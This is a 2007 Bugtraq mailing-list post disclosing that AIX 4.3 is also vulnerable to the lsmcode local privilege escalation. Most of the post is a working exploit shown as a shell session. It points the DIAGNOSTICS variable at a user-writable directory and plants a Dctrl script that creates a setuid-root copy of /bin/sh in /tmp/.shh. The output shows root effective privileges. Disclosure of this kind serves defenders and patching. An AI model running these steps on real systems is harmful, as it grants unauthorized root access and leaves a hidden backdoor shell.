AIX 4.3 lsmcode local root command execution

To:	bugtraq@securityfocus.com
Subject:	AIX 4.3 lsmcode local root command execution
From:	pr1nce_empire@yahoo.com
Date:	30 Mar 2007 03:21:57 -0000
Delivered-to:	sp-com-lists@consult.net
Delivered-to:	bugtraq-list@securepoint.com
Delivered-to:	mailing list bugtraq@securityfocus.com
Delivered-to:	moderator for bugtraq@securityfocus.com
List-help:	<mailto:bugtraq-help@securityfocus.com>
List-id:	<bugtraq.list-id.securityfocus.com>
List-post:	<mailto:bugtraq@securityfocus.com>
List-subscribe:	<mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe:	<mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list:	contact bugtraq-help@securityfocus.com; run by ezmlm

It has been reported on http://www.securityfocus.com/bid/18114/
about this vulnerability in AIX 5.1 - 5.3,
some exploits is published in milw0rm to exploits this issue 
http://milw0rm.com/exploits/701

I have an AIX 4.3 box and it seems vulnerable with this issue too

bash-2.04$ mkdirhier /tmp/aap/bin
bash-2.04$ export DIAGNOSTICS=/tmp/aap
bash-2.04$ cat > /tmp/aap/bin/Dctrl << EOF
> #!/bin/sh
> cp /bin/sh /tmp/.shh
> chown root:system /tmp/.shh
> chmod u+s /tmp/.shh
> EOF
bash-2.04$ cat /tmp/aap/bin/Dctrl
#!/bin/sh
cp /bin/sh /tmp/.shh
chown root:system /tmp/.shh
chmod u+s /tmp/.shh
bash-2.04$ chmod a+x /tmp/aap/bin/Dctrl
bash-2.04$ lsmcode
bash-2.04$ /tmp/.shh
# id
uid=221(xxx) gid=53(xxx) euid=0(root) groups=0(system),58(xxx)  --> gotcha 
euid=0

Yeah, even uid=221 but euid=0
Nothing new in this post, i just want to report that AIX 4.3 is vulnerable with 
this issue too

AO

<Prev in Thread]	Current Thread	[Next in Thread>
AIX 4.3 lsmcode local root command execution, pr1nce_empire <=

Previous by Date:	DrakeCMS multiple vulerabilities, security
Next by Date:	Re: Bypass phishing protection in Firefox / Opera, Łukasz Pilorz
Previous by Thread:	DrakeCMS multiple vulerabilities, security
Next by Thread:	The Week Of Vista Bugs [TWOVB], TWOVB Team
Indexes:	[Date] [Thread] [Top] [All Lists]